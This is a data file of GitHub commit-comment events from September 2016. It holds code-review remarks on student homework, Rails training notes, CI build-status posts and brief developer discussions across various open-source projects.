{"id":"4543157380","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"amy-b/homework-city"},"payload":{"comment":{"id":18971930,"position":24,"line":33,"path":"Assignment/starter_code/js/index.js","commit_id":"b5c8b294d20c370af699ad9db76f915f1b159001","created_at":"2016-09-10T00:54:40Z","updated_at":"2016-09-10T00:54:40Z","body":"Great job going for the bonus!"}},"created_at":"2016-09-10T00:54:40Z"}
{"id":"4543157546","type":"CommitCommentEvent","actor":{"login":"Treeston"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":18971931,"position":null,"line":null,"path":null,"commit_id":"2f493430c9f029867eb1699c54de853e06e850d9","created_at":"2016-09-10T00:54:46Z","updated_at":"2016-09-10T00:54:46Z","body":":+1:"}},"created_at":"2016-09-10T00:54:46Z"}
{"id":"4543162394","type":"CommitCommentEvent","actor":{"login":"hiromar"},"repo":{"name":"hiromar/training"},"payload":{"comment":{"id":18971938,"position":2,"line":2,"path":"app/models/relationship.rb","commit_id":"61a47409aa7bca0b545dfcd8bc054fc6adf9243b","created_at":"2016-09-10T00:57:33Z","updated_at":"2016-09-10T00:57:33Z","body":"relationshipsテーブルとusersテーブルをつなぐためには、外部キーに名前をuser_idのように<class名>_idとかく必要がある。これによてクラス名を推測する。しかし、今回はrelationshipsテーブルにはfollower_id, followed_idのようにクラスの存在しないものを外部キーに指定しているために、class_nameを使ってどのクラスと関連させるのか指定している"}},"created_at":"2016-09-10T00:57:33Z"}
{"id":"4543162933","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"amy-b/homework-city"},"payload":{"comment":{"id":18971940,"position":null,"line":null,"path":null,"commit_id":"b5c8b294d20c370af699ad9db76f915f1b159001","created_at":"2016-09-10T00:57:51Z","updated_at":"2016-09-10T00:57:51Z","body":"It's awesome to see you using multiple commits to show your progress. This is a great developer practice so others can see the evolution of your code. Your final code was flawless, keep up the great work!"}},"created_at":"2016-09-10T00:57:51Z"}
{"id":"4543163149","type":"CommitCommentEvent","actor":{"login":"hiromar"},"repo":{"name":"hiromar/training"},"payload":{"comment":{"id":18971941,"position":3,"line":3,"path":"app/models/relationship.rb","commit_id":"61a47409aa7bca0b545dfcd8bc054fc6adf9243b","created_at":"2016-09-10T00:57:58Z","updated_at":"2016-09-10T00:57:58Z","body":"relationshipsテーブルとusersテーブルをつなぐためには、外部キーに名前をuser_idのように_idとかく必要がある。これによてクラス名を推測する。しかし、今回はrelationshipsテーブルにはfollower_id, followed_idのようにクラスの存在しないものを外部キーに指定しているために、class_nameを使ってどのクラスと関連させるのか指定している"}},"created_at":"2016-09-10T00:57:58Z"}
{"id":"4543169111","type":"CommitCommentEvent","actor":{"login":"JuniorEm"},"repo":{"name":"JuniorEm/ATM-DEVELOPMENT"},"payload":{"comment":{"id":18971951,"position":null,"line":null,"path":null,"commit_id":"1853504d411b9d1a01f5b6cb806817e48428a08b","created_at":"2016-09-10T01:01:18Z","updated_at":"2016-09-10T01:01:18Z","body":"Boa, vamos editando conforme o tempo."}},"created_at":"2016-09-10T01:01:18Z"}
{"id":"4543171536","type":"CommitCommentEvent","actor":{"login":"taddallas"},"repo":{"name":"paigemiller/LabNotebook"},"payload":{"comment":{"id":18971954,"position":null,"line":null,"path":null,"commit_id":"5010e18c2adc21226b923fc6e353f49db5c4278d","created_at":"2016-09-10T01:02:45Z","updated_at":"2016-09-10T01:02:45Z","body":":+1: "}},"created_at":"2016-09-10T01:02:45Z"}
{"id":"4543179764","type":"CommitCommentEvent","actor":{"login":"psylone"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":18971964,"position":52,"line":52,"path":"lesson_3/disp_app.rb","commit_id":"e349a98b18e2b8f4048a4aaf3cc2434a68dab0c2","created_at":"2016-09-10T01:07:22Z","updated_at":"2016-09-10T01:07:22Z","body":"> В коде класс Route находится ниже класса Train, поэтому к моменту вызова этого метода еще ни один route не создался.\r\n\r\nЭто меня очень смущает, определение классов здесь не должно играть роли. Ты же уже после их подключения создаёшь объекты поезда и маршрута, и вызываешь метод `use_route` у поезда."}},"created_at":"2016-09-10T01:07:22Z"}
{"id":"4543180556","type":"CommitCommentEvent","actor":{"login":"hiromar"},"repo":{"name":"hiromar/training"},"payload":{"comment":{"id":18971967,"position":16,"line":25,"path":"db/schema.rb","commit_id":"61a47409aa7bca0b545dfcd8bc054fc6adf9243b","created_at":"2016-09-10T01:07:48Z","updated_at":"2016-09-10T01:07:48Z","body":"add_indexで、カラムのデータを取り出して高速で検索できるようにしてある。\r\nunique: trueで、同じユーザーを二回以上フォローしないように設定してある。"}},"created_at":"2016-09-10T01:07:48Z"}
{"id":"4543183555","type":"CommitCommentEvent","actor":{"login":"dschwen"},"repo":{"name":"idaholab/moose"},"payload":{"comment":{"id":18971971,"position":15,"line":1293,"path":"modules/phase_field/src/postprocessors/GrainTracker.C","commit_id":"944f5a14d9d2a8df1b75e275c3f99fbdbaa5653b","created_at":"2016-09-10T01:09:35Z","updated_at":"2016-09-10T01:09:35Z","body":"Operator spacing"}},"created_at":"2016-09-10T01:09:35Z"}
{"id":"4543183801","type":"CommitCommentEvent","actor":{"login":"MarkHerhold"},"repo":{"name":"Starcounter-Jack/JSON-Patch"},"payload":{"comment":{"id":18971972,"position":null,"line":null,"path":null,"commit_id":"924069918a7033849c1e61e793488b506f1849c1","created_at":"2016-09-10T01:09:45Z","updated_at":"2016-09-10T01:09:45Z","body":"@warpech Ok, thanks for taking the time to explain! :+1: "}},"created_at":"2016-09-10T01:09:45Z"}
{"id":"4543187289","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"ovanegas6/homework-city"},"payload":{"comment":{"id":18971979,"position":10,"line":10,"path":"js/index.js","commit_id":"22dd3a985200086559442d0ed9123fd960272ada","created_at":"2016-09-10T01:11:43Z","updated_at":"2016-09-10T01:11:43Z","body":"Great job pseudocoding. It is clear and easy to follow what you are doing"}},"created_at":"2016-09-10T01:11:43Z"}
{"id":"4543187437","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"Chaparroa/hw_assignment_2"},"payload":{"comment":{"id":18971980,"position":2,"line":2,"path":"starter_code/js/relaxr.js","commit_id":"08e5e7d8774312b88874ab33780c68eddf637758","created_at":"2016-09-10T01:11:49Z","updated_at":"2016-09-10T01:11:49Z","body":"nice job ensuring jQuery is working properly "}},"created_at":"2016-09-10T01:11:49Z"}
{"id":"4543187650","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"Chaparroa/hw_assignment_2"},"payload":{"comment":{"id":18971981,"position":4,"line":4,"path":"starter_code/js/relaxr.js","commit_id":"08e5e7d8774312b88874ab33780c68eddf637758","created_at":"2016-09-10T01:11:57Z","updated_at":"2016-09-10T01:11:57Z","body":"Great to see you commenting your code like this!"}},"created_at":"2016-09-10T01:11:57Z"}
{"id":"4543187660","type":"CommitCommentEvent","actor":{"login":"alesl"},"repo":{"name":"alesl/fraction"},"payload":{"comment":{"id":18971982,"position":5,"line":36,"path":"src/Fraction.php","commit_id":"528e935ae8929e66d31632a30f545da2182e454a","created_at":"2016-09-10T01:11:57Z","updated_at":"2016-09-10T01:11:57Z","body":"@tomhv because i'm using bcmath for calculations and using bcmath because i didn't want to lose precision when numerator and/or denominator \"overflows\" to floating point\r\n\r\nregards,\r\nales"}},"created_at":"2016-09-10T01:11:57Z"}
{"id":"4543188917","type":"CommitCommentEvent","actor":{"login":"vmaudgalya"},"repo":{"name":"nicknisi/dotfiles"},"payload":{"comment":{"id":18971987,"position":null,"line":null,"path":null,"commit_id":"fcc21658dce0043173d3929b337804fca869f73a","created_at":"2016-09-10T01:12:40Z","updated_at":"2016-09-10T01:12:40Z","body":"Anytime 👍 "}},"created_at":"2016-09-10T01:12:40Z"}
{"id":"4543189144","type":"CommitCommentEvent","actor":{"login":"permcody"},"repo":{"name":"idaholab/moose"},"payload":{"comment":{"id":18971988,"position":15,"line":1293,"path":"modules/phase_field/src/postprocessors/GrainTracker.C","commit_id":"944f5a14d9d2a8df1b75e275c3f99fbdbaa5653b","created_at":"2016-09-10T01:12:47Z","updated_at":"2016-09-10T01:12:47Z","body":"Damnit"}},"created_at":"2016-09-10T01:12:47Z"}
{"id":"4543189249","type":"CommitCommentEvent","actor":{"login":"emdubb"},"repo":{"name":"ovanegas6/homework-city"},"payload":{"comment":{"id":18971989,"position":null,"line":null,"path":null,"commit_id":"22dd3a985200086559442d0ed9123fd960272ada","created_at":"2016-09-10T01:12:51Z","updated_at":"2016-09-10T01:12:51Z","body":"You are doing very well on your assignments. It seems like you have a great handle on this, perhaps try some of the bonuses like clearing the text field after submission or checking for different cases. Keep up the great work!"}},"created_at":"2016-09-10T01:12:51Z"}
{"id":"4543192003","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"Chaparroa/hw_assignment_2"},"payload":{"comment":{"id":18971993,"position":6,"line":6,"path":"starter_code/js/relaxr.js","commit_id":"08e5e7d8774312b88874ab33780c68eddf637758","created_at":"2016-09-10T01:14:16Z","updated_at":"2016-09-10T01:14:16Z","body":"Nice work preventing the default behavior....to be clear, this is preventing the link from \"jumping\", not a form from submitting, but I realize on the tech requirements it was worded as \"preventing a form submission\", and you have implemented what we were looking for!"}},"created_at":"2016-09-10T01:14:16Z"}
{"id":"4543192146","type":"CommitCommentEvent","actor":{"login":"chelseakomlo"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18971994,"position":98,"line":98,"path":"otrv4.md","commit_id":"e381599d66b3c6759c8358cf128e43599ef1c2d0","created_at":"2016-09-10T01:14:21Z","updated_at":"2016-09-10T01:14:21Z","body":"This didn't turn out so well in markdown :) "}},"created_at":"2016-09-10T01:14:21Z"}
{"id":"4543193004","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"Chaparroa/hw_assignment_2"},"payload":{"comment":{"id":18971996,"position":24,"line":24,"path":"starter_code/js/relaxr.js","commit_id":"08e5e7d8774312b88874ab33780c68eddf637758","created_at":"2016-09-10T01:14:52Z","updated_at":"2016-09-10T01:14:52Z","body":"Great to see you playing around with some other event listeners here!"}},"created_at":"2016-09-10T01:14:52Z"}
{"id":"4543199067","type":"CommitCommentEvent","actor":{"login":"hsluoyz"},"repo":{"name":"nmap/npcap"},"payload":{"comment":{"id":18972007,"position":null,"line":null,"path":null,"commit_id":"87b126d6c9887bb05f0164953f1eb89a4888c56e","created_at":"2016-09-10T01:18:16Z","updated_at":"2016-09-10T01:18:16Z","body":"You can send me your ``minidump`` and ``DiagReport`` to see if the BSoD is related to Npcap. If you have used a newer version Npcap when running DiagReport than the version causes BSoD, please report the Npcap version manually."}},"created_at":"2016-09-10T01:18:16Z"}
{"id":"4543199132","type":"CommitCommentEvent","actor":{"login":"frank-dittrich"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18972008,"position":null,"line":null,"path":null,"commit_id":"822b53674093b45e903480e15c8a0913d8d09fb8","created_at":"2016-09-10T01:18:18Z","updated_at":"2016-09-10T01:18:18Z","body":"Is there no other \"fix\" for this?\r\nI wonder why no other format needs to add `'\\0'` to their self test hashes."}},"created_at":"2016-09-10T01:18:18Z"}
{"id":"4543200470","type":"CommitCommentEvent","actor":{"login":"amorag"},"repo":{"name":"geneura-papers/2015_books"},"payload":{"comment":{"id":18972010,"position":null,"line":null,"path":null,"commit_id":"e0eedb10f4310f26928e12033f7ceeee7233926d","created_at":"2016-09-10T01:19:02Z","updated_at":"2016-09-10T01:19:02Z","body":"Ya te digo. XD"}},"created_at":"2016-09-10T01:19:02Z"}
{"id":"4543202291","type":"CommitCommentEvent","actor":{"login":"wadkar"},"repo":{"name":"HSorensen/antlr4ide"},"payload":{"comment":{"id":18972014,"position":null,"line":null,"path":null,"commit_id":"7c1d4c0f9de75513f03b553abce35903b77d2b0d","created_at":"2016-09-10T01:20:10Z","updated_at":"2016-09-10T01:20:10Z","body":"I could be wrong, but the source code doesn't seem to have this patch: see relevant lines in [DefaultToolTipsProvider.xtend](https://github.com/jknack/antlr4ide/blob/master/antlr4ide.ui/src/main/java/com/github/jknack/antlr4ide/ui/generator/DefaultToolOptionsProvider.xtend#L97) and in [Antlr4ToolLaunchConfigurationDelegate.xtend](https://github.com/jknack/antlr4ide/blob/master/antlr4ide.ui/src/main/java/com/github/jknack/antlr4ide/ui/launch/Antlr4ToolLaunchConfigurationDelegate.xtend#L51) . \r\n\r\nDo you think we could create a PR for this and get it merged for release?"}},"created_at":"2016-09-10T01:20:10Z"}
{"id":"4543205878","type":"CommitCommentEvent","actor":{"login":"braxtonmckee"},"repo":{"name":"ufora/ufora"},"payload":{"comment":{"id":18972019,"position":null,"line":null,"path":null,"commit_id":"1417baf226b49a4ea84e7c01224a1c2e82fb1546","created_at":"2016-09-10T01:22:19Z","updated_at":"2016-09-10T01:22:19Z","body":"@atzannes this fixes the bug you found in that test. We were failing to retain a reference to `x` in `x.y.z` because the generated code just replaces the assignment with an exception and doesn't continue to include a free variable. The downstream infrastructure then fails to bind `x` and then gets messed up when it wants to convert it back to python and doesn't find a value."}},"created_at":"2016-09-10T01:22:19Z"}
{"id":"4543207173","type":"CommitCommentEvent","actor":{"login":"Slydelix"},"repo":{"name":"MarshRom/android_packages_apps_Settings"},"payload":{"comment":{"id":18972022,"position":15,"line":124,"path":"src/com/android/settings/MarshSettings.java","commit_id":"3403458231b44109d9f065de2327916e3ba2d577","created_at":"2016-09-10T01:23:07Z","updated_at":"2016-09-10T01:23:07Z","body":"hope this one means recents blur :/"}},"created_at":"2016-09-10T01:23:07Z"}
{"id":"4543212832","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18972035,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T01:26:38Z","updated_at":"2016-09-10T01:26:38Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-10T01:26:38Z"}
{"id":"4543214073","type":"CommitCommentEvent","actor":{"login":"ojhasandeep"},"repo":{"name":"ojhasandeep/sharedwork"},"payload":{"comment":{"id":18972040,"position":5,"line":8,"path":"work/src/work/App.java","commit_id":"b91ed18e7c5161b1c24186aed3c33a3bff26d3cb","created_at":"2016-09-10T01:27:25Z","updated_at":"2016-09-10T01:27:25Z","body":"add another text this is far"}},"created_at":"2016-09-10T01:27:25Z"}
{"id":"4543214753","type":"CommitCommentEvent","actor":{"login":"ojhasandeep"},"repo":{"name":"ojhasandeep/sharedwork"},"payload":{"comment":{"id":18972042,"position":null,"line":null,"path":null,"commit_id":"b91ed18e7c5161b1c24186aed3c33a3bff26d3cb","created_at":"2016-09-10T01:27:52Z","updated_at":"2016-09-10T01:27:52Z","body":"this is a comment"}},"created_at":"2016-09-10T01:27:52Z"}
{"id":"4543217915","type":"CommitCommentEvent","actor":{"login":"whoburg"},"repo":{"name":"hoburg/gpkit"},"payload":{"comment":{"id":18972047,"position":null,"line":null,"path":null,"commit_id":"37205eb345f50af751347c0a142f7763ea912612","created_at":"2016-09-10T01:29:59Z","updated_at":"2016-09-10T01:29:59Z","body":"I'm not used to reviewing with the new squashing method. This is already on master, right? (but still shows up in the diff because the version on master appears in the squashed version 571e9cccd4654126a970ddfc8ca3d33b58b4e947).\r\n\r\nI miss having a nice view of only the commits introduced by a particular PR..."}},"created_at":"2016-09-10T01:29:59Z"}
{"id":"4543219175","type":"CommitCommentEvent","actor":{"login":"wpferguson"},"repo":{"name":"darktable-org/lua-scripts"},"payload":{"comment":{"id":18972049,"position":null,"line":null,"path":null,"commit_id":"e74b253f64304dfb5da1de07791e748df78edbf9","created_at":"2016-09-10T01:30:42Z","updated_at":"2016-09-10T01:30:42Z","body":"Thanks @supertobi "}},"created_at":"2016-09-10T01:30:42Z"}
{"id":"4543223423","type":"CommitCommentEvent","actor":{"login":"hiromar"},"repo":{"name":"hiromar/training"},"payload":{"comment":{"id":18972055,"position":7,"line":9,"path":"app/models/user.rb","commit_id":"61a47409aa7bca0b545dfcd8bc054fc6adf9243b","created_at":"2016-09-10T01:33:21Z","updated_at":"2016-09-10T01:33:21Z","body":"active_relationshipでフォローしているので能動的関係、passive_relationshipでフォーローされているので受動的関係で分けている。dependent: :destroyでアカウントが削除されたらユーザーのリレーションシップも削除されるように設定してある。"}},"created_at":"2016-09-10T01:33:21Z"}
{"id":"4543224657","type":"CommitCommentEvent","actor":{"login":"killme"},"repo":{"name":"elBukkit/MagicPlugin"},"payload":{"comment":{"id":18972059,"position":null,"line":null,"path":null,"commit_id":"f712a7cb56c70046f20be900b53b23e90b142d43","created_at":"2016-09-10T01:34:05Z","updated_at":"2016-09-10T01:34:05Z","body":"Instead of creating merge commits, it would probably be better to always rebase when pulling from the origin.\r\n(`git pull --rebase`)\r\nThat way the history will be nicely linear.\r\n(Use `git config --global pull.ff only` to make `git pull` never create a merge commit)"}},"created_at":"2016-09-10T01:34:05Z"}
{"id":"4543225756","type":"CommitCommentEvent","actor":{"login":"dabd"},"repo":{"name":"dabd/fpscala"},"payload":{"comment":{"id":18972060,"position":43,"line":78,"path":"src/test/scala/fpinscala/DataStructures.scala","commit_id":"a1835fec4f60fd87ad7c8015d95bcbee8102c473","created_at":"2016-09-10T01:34:45Z","updated_at":"2016-09-10T01:34:45Z","body":"I've never thought about enforcing a correct implementation, as in \"properties first\" TDD.  \r\nThanks."}},"created_at":"2016-09-10T01:34:45Z"}
{"id":"4543226574","type":"CommitCommentEvent","actor":{"login":"manradhaCisco"},"repo":{"name":"manradhaCisco/ydk-gen"},"payload":{"comment":{"id":18972063,"position":13,"line":174,"path":"ydkgen/printer/cpp/header_printer.py","commit_id":"1a0624d6765f8b90527368d4fb00ccbe05da080f","created_at":"2016-09-10T01:35:16Z","updated_at":"2016-09-10T01:35:16Z","body":"not sure about this one. For one it is returning an EntityPath "}},"created_at":"2016-09-10T01:35:16Z"}
{"id":"4543226728","type":"CommitCommentEvent","actor":{"login":"deb-sandeep"},"repo":{"name":"deb-sandeep/JoveNotesParth"},"payload":{"comment":{"id":18972064,"position":null,"line":null,"path":null,"commit_id":"3d7fb3177e3910e8a5a76900ebd7dfc6f17e5680","created_at":"2016-09-10T01:35:21Z","updated_at":"2016-09-10T01:35:21Z","body":"Vivek, you are better off using @fib for the above Hindi grammar as compared to @Wm. "}},"created_at":"2016-09-10T01:35:21Z"}
{"id":"4543229178","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18972071,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T01:36:57Z","updated_at":"2016-09-10T01:36:57Z","body":"develop (mjwitte) - x86_64-MacOS-10.9-clang: OK (1759 of 1759 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-10T01:36:57Z"}
{"id":"4543231271","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"Chaparroa/homework-city"},"payload":{"comment":{"id":18972073,"position":1,"line":1,"path":"js/citipix.js","commit_id":"656656408b38b40e6d63d8ef59d4ba7fe2331683","created_at":"2016-09-10T01:38:27Z","updated_at":"2016-09-10T01:38:27Z","body":"Great job pseudo-coding this out ...really great to see your comments!"}},"created_at":"2016-09-10T01:38:27Z"}
{"id":"4543231543","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"Chaparroa/homework-city"},"payload":{"comment":{"id":18972074,"position":9,"line":9,"path":"js/citipix.js","commit_id":"656656408b38b40e6d63d8ef59d4ba7fe2331683","created_at":"2016-09-10T01:38:38Z","updated_at":"2016-09-10T01:38:38Z","body":"Nice work waiting for the document to load 👍 "}},"created_at":"2016-09-10T01:38:38Z"}
{"id":"4543231827","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"Chaparroa/homework-city"},"payload":{"comment":{"id":18972076,"position":10,"line":10,"path":"js/citipix.js","commit_id":"656656408b38b40e6d63d8ef59d4ba7fe2331683","created_at":"2016-09-10T01:38:50Z","updated_at":"2016-09-10T01:38:50Z","body":"Great job using jQuery to retrieve the value"}},"created_at":"2016-09-10T01:38:50Z"}
{"id":"4543234314","type":"CommitCommentEvent","actor":{"login":"jfoug"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18972081,"position":null,"line":null,"path":null,"commit_id":"822b53674093b45e903480e15c8a0913d8d09fb8","created_at":"2016-09-10T01:40:35Z","updated_at":"2016-09-10T01:40:35Z","body":"THis was due to a recent 'short' hash addition.  We might be able to fix this in valid (I think the crash is there)."}},"created_at":"2016-09-10T01:40:35Z"}
{"id":"4543236149","type":"CommitCommentEvent","actor":{"login":"lubin1516"},"repo":{"name":"hooponn/FreeSocketClient"},"payload":{"comment":{"id":18972085,"position":null,"line":null,"path":null,"commit_id":"7848242983741a7fe248ebaebffd183d85a2f93b","created_at":"2016-09-10T01:42:00Z","updated_at":"2016-09-10T01:42:00Z","body":"n！II "}},"created_at":"2016-09-10T01:42:00Z"}
{"id":"4543236308","type":"CommitCommentEvent","actor":{"login":"lubin1516"},"repo":{"name":"hooponn/FreeSocketClient"},"payload":{"comment":{"id":18972086,"position":null,"line":null,"path":null,"commit_id":"7848242983741a7fe248ebaebffd183d85a2f93b","created_at":"2016-09-10T01:42:09Z","updated_at":"2016-09-10T01:42:09Z","body":".bmi #0"}},"created_at":"2016-09-10T01:42:09Z"}
{"id":"4543236310","type":"CommitCommentEvent","actor":{"login":"barryross"},"repo":{"name":"Chaparroa/homework-city"},"payload":{"comment":{"id":18972087,"position":12,"line":12,"path":"js/citipix.js","commit_id":"656656408b38b40e6d63d8ef59d4ba7fe2331683","created_at":"2016-09-10T01:42:09Z","updated_at":"2016-09-10T01:42:09Z","body":"Because the functionality of the site is based off of the user's interaction with the form, we actually want \r\n```\r\nevent.preventDefault();\t\r\n```\r\nand the conditionals to go within the body of the event listener's anonymous function, like this:\r\n\r\n```\r\n$(\"#entry\").submit(function(){\r\n  event.preventDefault();\t\r\n //conditionals here\r\n}\r\n```\r\n\r\nThe reason being..we want that code to run in response to the user clicking submit, every time they click submit.  As it is now, that code will run one time, after the page loads, and ```event.preventDefaul()``` is throwing an error because it doesn't know which event to try and prevent. "}},"created_at":"2016-09-10T01:42:09Z"}
{"id":"4543237095","type":"CommitCommentEvent","actor":{"login":"hiromar"},"repo":{"name":"hiromar/training"},"payload":{"comment":{"id":18972088,"position":11,"line":13,"path":"app/models/user.rb","commit_id":"61a47409aa7bca0b545dfcd8bc054fc6adf9243b","created_at":"2016-09-10T01:42:38Z","updated_at":"2016-09-10T01:42:38Z","body":"followingと書いているのは、本来ならfollowedsとかくことでrelationshipテーブルのfollowed_idから対象のユーザーを取得するが、followedsは英単語として不適切なため。そのためfollowing配列の元はfollowed idの集合であるということを示すためにsource: :followedと書いている。followerのほうはsource書かなくておっけい"}},"created_at":"2016-09-10T01:42:38Z"}
{"id":"4543239476","type":"CommitCommentEvent","actor":{"login":"FacticiusVir"},"repo":{"name":"FacticiusVir/SharpVk"},"payload":{"comment":{"id":18972093,"position":null,"line":null,"path":null,"commit_id":"8fbad12797b9f959bb6cbb51e57414022f4437b3","created_at":"2016-09-10T01:44:13Z","updated_at":"2016-09-10T01:44:13Z","body":"#11 "}},"created_at":"2016-09-10T01:44:13Z"}
{"id":"4543239851","type":"CommitCommentEvent","actor":{"login":"FacticiusVir"},"repo":{"name":"FacticiusVir/SharpVk"},"payload":{"comment":{"id":18972094,"position":null,"line":null,"path":null,"commit_id":"7d680599737eaed49f14fbece9fb21c8ae5c3960","created_at":"2016-09-10T01:44:28Z","updated_at":"2016-09-10T01:44:28Z","body":"#11 "}},"created_at":"2016-09-10T01:44:28Z"}
{"id":"4543241174","type":"CommitCommentEvent","actor":{"login":"hiromar"},"repo":{"name":"hiromar/training"},"payload":{"comment":{"id":18972098,"position":17,"line":19,"path":"app/models/user.rb","commit_id":"61a47409aa7bca0b545dfcd8bc054fc6adf9243b","created_at":"2016-09-10T01:45:27Z","updated_at":"2016-09-10T01:45:27Z","body":"ユーザーをフォローするメソッド"}},"created_at":"2016-09-10T01:45:27Z"}
{"id":"4543241755","type":"CommitCommentEvent","actor":{"login":"aemnaruto"},"repo":{"name":"TeamWin/android_device_huawei_eva"},"payload":{"comment":{"id":18972099,"position":4,"line":76,"path":"BoardConfig.mk","commit_id":"53465857564857b43920244e0418961d8649d05e","created_at":"2016-09-10T01:45:50Z","updated_at":"2016-09-10T01:45:50Z","body":"Vs"}},"created_at":"2016-09-10T01:45:50Z"}
{"id":"4543241838","type":"CommitCommentEvent","actor":{"login":"hiromar"},"repo":{"name":"hiromar/training"},"payload":{"comment":{"id":18972100,"position":21,"line":23,"path":"app/models/user.rb","commit_id":"61a47409aa7bca0b545dfcd8bc054fc6adf9243b","created_at":"2016-09-10T01:45:53Z","updated_at":"2016-09-10T01:45:53Z","body":"ユーザーをアンフォローするメソッド"}},"created_at":"2016-09-10T01:45:53Z"}
{"id":"4543242542","type":"CommitCommentEvent","actor":{"login":"hiromar"},"repo":{"name":"hiromar/training"},"payload":{"comment":{"id":18972103,"position":26,"line":28,"path":"app/models/user.rb","commit_id":"61a47409aa7bca0b545dfcd8bc054fc6adf9243b","created_at":"2016-09-10T01:46:22Z","updated_at":"2016-09-10T01:46:22Z","body":"現在のユーザーがフォローしていたらtrueを返すメソッド"}},"created_at":"2016-09-10T01:46:22Z"}
{"id":"4543243029","type":"CommitCommentEvent","actor":{"login":"Daniel15"},"repo":{"name":"babel/babel"},"payload":{"comment":{"id":18972104,"position":null,"line":null,"path":null,"commit_id":"e5b9c92d3d20859c6aefdcc9df2f757dbe137b8e","created_at":"2016-09-10T01:46:42Z","updated_at":"2016-09-10T01:46:42Z","body":"> You can use http://babeljs.io/phabricator-redirects/T7567 to be redirected to the corresponding Github issue.\r\n\r\nFor the redirects, if/once Phabricator is totally turned off, it would probably be ideal to redirect old Phabricator URLs to the right place directly rather than having the strange `phabricator-redirects` URL :stuck_out_tongue: "}},"created_at":"2016-09-10T01:46:42Z"}
{"id":"4543245394","type":"CommitCommentEvent","actor":{"login":"hzoo"},"repo":{"name":"babel/babel"},"payload":{"comment":{"id":18972111,"position":null,"line":null,"path":null,"commit_id":"e5b9c92d3d20859c6aefdcc9df2f757dbe137b8e","created_at":"2016-09-10T01:48:28Z","updated_at":"2016-09-10T01:48:28Z","body":"I think we need to finish up https://github.com/babel/phabricator-to-github/issues/19 @danez"}},"created_at":"2016-09-10T01:48:28Z"}
{"id":"4543247101","type":"CommitCommentEvent","actor":{"login":"KenanSulayman"},"repo":{"name":"draios/python-sdc-client"},"payload":{"comment":{"id":18972113,"position":33,"line":89,"path":"sdcclient/_client.py","commit_id":"99fa5080b3aa32e30d5a026fc9d9f9b92e1c9504","created_at":"2016-09-10T01:49:42Z","updated_at":"2016-09-10T01:49:42Z","body":"I have no idea about python, but isn't this an aliasing issue?"}},"created_at":"2016-09-10T01:49:42Z"}
{"id":"4543247392","type":"CommitCommentEvent","actor":{"login":"zacharycohn"},"repo":{"name":"zacharycohn/finalproject"},"payload":{"comment":{"id":18972116,"position":17,"line":16,"path":"app/models/habit.rb","commit_id":"183d05499f55e9e709294264440c00579263d834","created_at":"2016-09-10T01:49:57Z","updated_at":"2016-09-10T01:49:57Z","body":"@ctro I tried \"return if self.checkins [...]\", and it kept crashing. Fixed it when deleted \"return\" out of the \"if\" line and added it in front of true and false.\r\n\r\nIs the syntax you used here accurate? I tried searching for an example of \"return if <things>\" but couldn't find anything."}},"created_at":"2016-09-10T01:49:57Z"}
{"id":"4543247435","type":"CommitCommentEvent","actor":{"login":"patricknelson"},"repo":{"name":"chrometoasters/silverstripe-gridfieldlimititems"},"payload":{"comment":{"id":18972117,"position":null,"line":null,"path":null,"commit_id":"479540712cd32131b030bb70f4cf2d57fcb72b55","created_at":"2016-09-10T01:50:00Z","updated_at":"2016-09-10T01:50:00Z","body":"Hey nice work! I actually just updated the repository to remove the 'add' button (for record editor fields). \r\n\r\nhttps://github.com/patricknelson/silverstripe-gridfieldlimititems/commit/b5914f222b269433412425ae994f914b7a52fff4\r\n\r\nCould you submit a PR as well for the auto completer? If so, please set that up as a separate option (i.e. `removeAutocompleter` with a setter and default it to `true` and I can make this `0.2.1` (currently at `0.2.0` now after my button tweak`)."}},"created_at":"2016-09-10T01:50:00Z"}
